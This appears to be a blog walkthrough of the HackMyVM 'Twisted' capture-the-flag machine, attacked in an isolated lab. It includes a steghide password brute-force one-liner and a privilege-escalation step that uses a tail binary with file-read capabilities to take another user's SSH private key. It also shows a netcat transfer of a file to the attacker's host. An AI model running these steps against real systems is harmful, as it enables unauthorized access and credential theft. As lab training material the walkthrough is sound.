0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

HackMyVM | Twisted

In this walkthrough, I demonstrate how I obtained complete ownership of Twisted from HackMyVM
0xBEN
6 min read
HackMyVM | Twisted
https://downloads.hackmyvm.eu/twisted.zip
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.94SVN scan initiated Sat Dec 21 01:30:18 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.13
Nmap scan report for 10.9.9.13
Host is up (0.00045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
|   256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
|_  256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 21 01:30:26 2024 -- 1 IP address (1 host up) scanned in 7.82 seconds





Service Enumeration

TCP/80

The two images on the site index are two different files. I'm not going to get into possible steganalysis just yet, but will download them for review later.
wget http://10.9.9.13/cat-original.jpg
wget http://10.9.9.13/cat-hidden.jpg



robots.txt

ℹ️
Using gobuster, I didn't find any additional directories or files under the site root or /nothing.



Steganalysis

file cat-original.jpg
file cat-hidden.jpg

Determine the file type and test for irregularities

binwalk cat-original.jpg
binwalk cat-hidden.jpg

Use binwalk to detect any kind of media embedded in the file

exiftool -a -e -u -U cat-original.jpg
exiftool -a -e -u -U cat-hidden.jpg

Check the image metadata for any comments or other irregularities

ls -l cat-original.jpg
ls -l cat-hidden.jpg

Determine the file size to see if the files are identical

💡
At this point, file and binwalk don't reveal anything significant. However, ls -l shows that cat-hidden.jpg is slightly larger by 13 bytes. We can probably assume some data has been embedded in cat-hidden.jpg and that we'll need a password to extract it.
awk '{ c = "steghide extract -sf cat-hidden.jpg -p " $1 " 2>/dev/null" ; if (system(c) == 0) { print "Password found: " $1;  exit } }' < ~/Pentest/WordLists/rockyou.txt && echo "steghide extracted data to: $(find . -type f -ctime -0.01)"

awk is an excellent choice for brute-forcing stego challenges with large password lists, as it is extremely fast. With this one-liner, we're reading rockyou.txt and feeding that to steghide. If a valid password is found, print it and exit the awk script. Then, print the file steghide extracted to.

If I had to guess, the username is mateo and the password is either sexymama or thisismypassword. I'd wager we'll have access via the SSH server on tcp/2222





Exploit

SSH as Mateo

I tried both passwords, sexymama first, which failed





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
    
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

Current User

uid=1000(mateo) gid=1000(mateo) groups=1000(mateo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

-bash: sudo: command not found



Users and Groups

Local Users

mateo:x:1000:1000:mateo,,,:/home/mateo:/bin/bash
markus:x:1001:1001:,,,:/home/markus:/bin/bash
bonita:x:1002:1002:,,,:/home/bonita:/bin/bash

Local Groups

cdrom:x:24:mateo
floppy:x:25:mateo
audio:x:29:mateo
dip:x:30:mateo
video:x:44:mateo
plugdev:x:46:mateo
netdev:x:109:mateo
mateo:x:1000:
markus:x:1001:
bonita:x:1002:



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:e8:57:b1 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.13/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 6532sec preferred_lft 6532sec
    inet6 fe80::be24:11ff:fee8:57b1/64 scope link 
       valid_lft forever preferred_lft forever



Interesting Files

/home/mateo/note.txt

/var/www/html/gogogo.wav

SUID File

find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null

-rwsrws--- 1 root bonita 16864 Oct 14  2020 /home/bonita/beroot





Privilege Escalation

WAV File Analysis

file /var/www/html/gogogo.wav
/var/www/html/gogogo.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11050 Hz
scp -P 2222 mateo@10.9.9.13:/var/www/html/gogogo.wav .

Copy the file locally to Kali for further analysis

💡
Listening to the audio, it's a series of pulses and silence, which clearly indicates the use of Morse code. We need to convert the Morse code audio to text and then convert the text to human readable characters.
extract morse code from wav file - Google Search
Google Search
https://morsefm.com/



Pivot to Markus

💡
I'm not having any luck with the privilege escalation as mateo, so I went back and tried the same steganalysis on cat-original.jpg and found another username and password.
ssh -p 2222 markus@10.9.9.13
ℹ️
From here, we repeat the post-exploit enumeration process



Interesting Files

/home/markus/note.txt

Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
The file is unreadable, I was unable to find a SUID binary to read the file, but there is a binary with capabilities to bypass the permissions checks
/usr/sbin/getcap -r / 2>/dev/null
/usr/bin/tail = cap_dac_read_search+ep
Overview of Linux capabilities
Linux capabilities provide a way to separate privileged actions. This overview shows the available Linux capabilities and their purpose.
Linux AuditMichael Boelen



Lateral to Bonita

/usr/bin/tail -n 10000 /var/cache/apt/id_rsa > /home/markus/id_rsa
chmod 600 /home/markus/id_rsa
ssh -i /home/markus/id_rsa -p 2222 bonita@localhost
💡
Now, we can come back to that SUID binary we enumerated earlier as mateo
This seems like a simple string comparison and should be easy to debug with gdb



Becoming Root

Transfer the Binary to Kali

nc -q 3 -lnvp 50443 > beroot

Start a listener on Kali to catch the file

nc -q 3 -nv 10.6.6.9 50443 < beroot

Transfer the file to Kali by connecting to the listener

chmod +x beroot
gdb beroot
(gdb) break main
(gdb) run
(gdb) disassemble main
The cmp operation compares the hexadecimal 0x16f8 to our input stored in the EAX register and if the values are equal, jump to the next operation in main()
The decimal value for 0x16f8 is 5880, so that is likely the code to enter



Flags

User

HMVblackcat

Root

HMVwhereismycat
Written by
0xBEN

0xBEN

View all posts
Comments
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.